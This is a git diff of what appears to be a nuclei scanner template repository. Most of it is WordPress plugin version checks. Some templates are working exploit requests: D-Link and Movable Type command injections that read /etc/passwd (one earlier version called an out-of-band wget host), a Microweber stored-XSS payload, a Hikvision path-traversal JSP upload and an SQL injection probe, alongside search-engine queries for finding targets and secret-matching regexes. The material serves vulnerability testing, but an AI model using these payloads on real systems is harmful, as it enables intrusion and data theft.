https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-8277 + metadata: + fofa-query: "wp-content/plugins/woocommerce-photo-reviews/" + google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/" + shodan-query: 'vuln:CVE-2024-8277' + tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-photo-reviews" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.13.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8369.yaml b/poc/cve/CVE-2024-8369.yaml new file mode 100644 index 0000000000..e1b203f1f3 --- /dev/null +++ b/poc/cve/CVE-2024-8369.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8369 + +info: + name: > + EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure + author: topscoder + severity: high + description: > + The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8369 + metadata: + fofa-query: "wp-content/plugins/eventprime-event-calendar-management/" + google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/" + shodan-query: 'vuln:CVE-2024-8369' + tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventprime-event-calendar-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml b/poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml new file mode 100644 index 0000000000..e16d01feaf --- /dev/null +++ b/poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8440-a970a1df0c7918e0736009309dc70109 + +info: + name: > + Essential Addons for Elementor -- Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Fancy Text Widget + author: topscoder + severity: low + description: > + The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8440 + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:CVE-2024-8440' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8478.yaml b/poc/cve/CVE-2024-8478.yaml new file mode 100644 index 0000000000..60791c5157 --- /dev/null +++ b/poc/cve/CVE-2024-8478.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8478 + +info: + name: > + Affiliate Super Assistent <= 1.5.3 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.5.3. This is due to the software allowing users to supply arbitrary shortcodes in comments when the 'Parse comments' option is enabled. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8478 + metadata: + fofa-query: "wp-content/plugins/amazonsimpleadmin/" + google-query: inurl:"/wp-content/plugins/amazonsimpleadmin/" + shodan-query: 'vuln:CVE-2024-8478' + tags: cve,wordpress,wp-plugin,amazonsimpleadmin,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/amazonsimpleadmin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "amazonsimpleadmin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8543.yaml b/poc/cve/CVE-2024-8543.yaml new file mode 100644 index 0000000000..e80141baab --- /dev/null +++ b/poc/cve/CVE-2024-8543.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8543 + +info: + name: > + Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Slider comparison image before and after plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [sciba] shortcode in all versions up to, and including, 0.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8543 + metadata: + fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/" + google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/" + shodan-query: 'vuln:CVE-2024-8543' + tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-comparison-image-before-and-after" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.3') \ No newline at end of file diff --git a/poc/cve/cve-2020-16920.yaml b/poc/cve/cve-2020-16920.yaml index d15e9704d0..c45dc73829 100644 --- a/poc/cve/cve-2020-16920.yaml +++ b/poc/cve/cve-2020-16920.yaml @@ -1,59 +1,53 @@ -id: CVE-2019-16920 - -info: - name: Unauthenticated Multiple D-Link Routers RCE - author: dwisiswant0 - severity: critical - description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. - - # References: - # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r - -requests: - - raw: - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - type: status - status: +id: CVE-2019-16920 + +info: + name: Unauthenticated Multiple D-Link Routers RCE + author: dwisiswant0 + severity: critical + description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + part: body + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/cve/cve-2020-36112.yaml b/poc/cve/cve-2020-36112.yaml new file mode 100644 index 0000000000..474b9b212a --- /dev/null +++ b/poc/cve/cve-2020-36112.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-36112 + +info: + name: CSE Bookstore 1.0 SQL Injection + author: geeknik + description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. + reference: + - https://www.exploit-db.com/exploits/49314 + - https://www.tenable.com/cve/CVE-2020-36112 + severity: critical + tags: cve,cve2020,sqli,cse + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-36112 + cwe-id: CWE-89 + +requests: + - raw: + - | + GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - "get book price failed! You have an error in your SQL syntax" + - "Can't retrieve data You have an error in your SQL syntax" + condition: or diff --git a/poc/cve/cve-2021-20837.yaml b/poc/cve/cve-2021-20837.yaml index 8433e63c9d..ab208a01bc 100644 --- a/poc/cve/cve-2021-20837.yaml +++ b/poc/cve/cve-2021-20837.yaml @@ -1,56 +1,42 @@ id: CVE-2021-20837 info: - name: MovableType - Remote Command Injection - author: dhiyaneshDK,hackergautam - severity: critical - description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. - reference: - - https://nemesis.sh/posts/movable-type-0day/ - - https://github.com/ghost-nemesis/cve-2021-20837-poc - - https://twitter.com/cyber_advising/status/1454051725904580608 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-20837 - cwe-id: CWE-78 - tags: cve,cve2021,rce,movable + name: Movable Type XMLRPC API vulnerable to OS command injection + author: Min Won + description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher.. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + severity: high + tags: cve,cve2021,rce requests: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} + User-Agent: POC + Accept: */* + Content-Length: 198 + Connection: close Content-Type: text/xml - + - mt.handler_to_coderef - - - - - {{base64("`wget http://{{interactsh-url}}`")}} - - - - + mt.handler_to_coderef + + + + + YGNhdCAvZXRjL3Bhc3N3ZGA= + + + + matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - words: - - "failed loading package" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/05 + - type: regex + regex: + - "root:.*:0:0:" + part: body + diff --git a/poc/cve/cve-2022-0921.yaml b/poc/cve/cve-2022-0921.yaml index 09542ab5a1..5eeef53133 100644 --- a/poc/cve/cve-2022-0921.yaml +++ b/poc/cve/cve-2022-0921.yaml @@ -1,26 +1,37 @@ id: CVE-2022-0954 info: - name: Microweber - Cross-site Scripting + name: Microweber <1.2.11 - Stored Cross-Site Scripting author: amit-jd severity: medium description: | - Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. + Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability. reference: - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0954 cwe-id: CWE-79 + epss-score: 0.00144 + epss-percentile: 0.50222 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,xss,microweber,huntr + verified: true + max-request: 3 + vendor: microweber + product: microweber + tags: cve2022,cve,xss,microweber,huntr -requests: +http: - raw: - | POST /api/user_login HTTP/1.1 @@ -28,7 +39,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | POST /api/save_option HTTP/2 Host: {{Hostname}} @@ -36,7 +46,6 @@ requests: Referer: {{BaseURL}}/admin/view:shop/action:options option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother - - | POST /module/ HTTP/2 Host: {{Hostname}} @@ -45,13 +54,12 @@ requests: module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - 'contains(body_2,"true")' - contains(body_3,'\">\" placeholder=\"Use default') - - 'contains(all_headers_3,"text/html")' + - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and +# digest: 490a00463044022000cc9a8206ccbc823b71b7d11682af57eb62c7cd6d15308e393af5d9460b13a00220128133adc23ad3f11a14baec1fdfa7049669509da1033a5bb705a1ccb4e4e650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/debug/wp-debug-log.yaml b/poc/debug/wp-debug-log.yaml old mode 100755 new mode 100644 index 2658a93803..8b743b299e --- a/poc/debug/wp-debug-log.yaml +++ b/poc/debug/wp-debug-log.yaml @@ -1,43 +1,25 @@ id: wp-debug-log info: name: WordPress debug log - author: - - l0ne1y - description: |- - WordPress debug log 调试信息泄漏漏洞 - WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 - WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 + author: geraldino2,dwisiswant0 severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com - - 临时修复方案: - 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 - 2、将敏感信息进行加密存储,非必要不可发送前端 - 3、发送敏感信息时需加密传输,如有必要需脱敏处理 - 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 - 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 - 令、会话标识jsessionid等), 防止敏感信息泄漏。 - 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 - 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 - 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + tags: wordpress,log requests: -- matchers: - - type: word - condition: or - part: header - words: - - octet-stream - - text/plain - - type: regex - part: body - regex: - - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/wp-content/debug.log' - method: GET + - method: GET + path: + - "{{BaseURL}}/wp-content/debug.log" + matchers-condition: and + matchers: + - type: word + words: + - octet-stream + - text/plain + part: header + condition: or + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body + - type: status + status: + - 200 diff --git a/poc/google/google-secrets.yaml b/poc/google/google-secrets.yaml index d9cb5cef3a..a689838b9d 100644 --- a/poc/google/google-secrets.yaml +++ b/poc/google/google-secrets.yaml @@ -15,21 +15,21 @@ file: extractors: - type: regex - name: facebook-access-token + name: google-api-key regex: - - "EAACEdEose0cBA[0-9A-Za-z]+" + - "AIza[0-9A-Za-z\\\\-_]{35}" - type: regex - name: facebook-client-id + name: google-cloud-platform-api-key regex: - - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" + - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" - type: regex - name: facebook-oauth + name: google-oauth regex: - - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" + - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" - type: regex - name: facebook-secret-key + name: google-oauth-access-token regex: - - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" + - "ya29\\\\.[0-9A-Za-z\\\\-_]+" diff --git a/poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml b/poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml new file mode 100644 index 0000000000..255f27faba --- /dev/null +++ b/poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml @@ -0,0 +1,59 @@ +id: custom-css-js-php-38595c300b5439c3ff06f9de9b42f302 + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/other/Hikvision_Env_Information_Leakage.yaml +++ b/poc/other/Hikvision_Env_Information_Leakage.yaml @@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index b35ef84818..1cd783867f 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml @@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,36 +14,15 @@ info: http: - method: GET path: - - 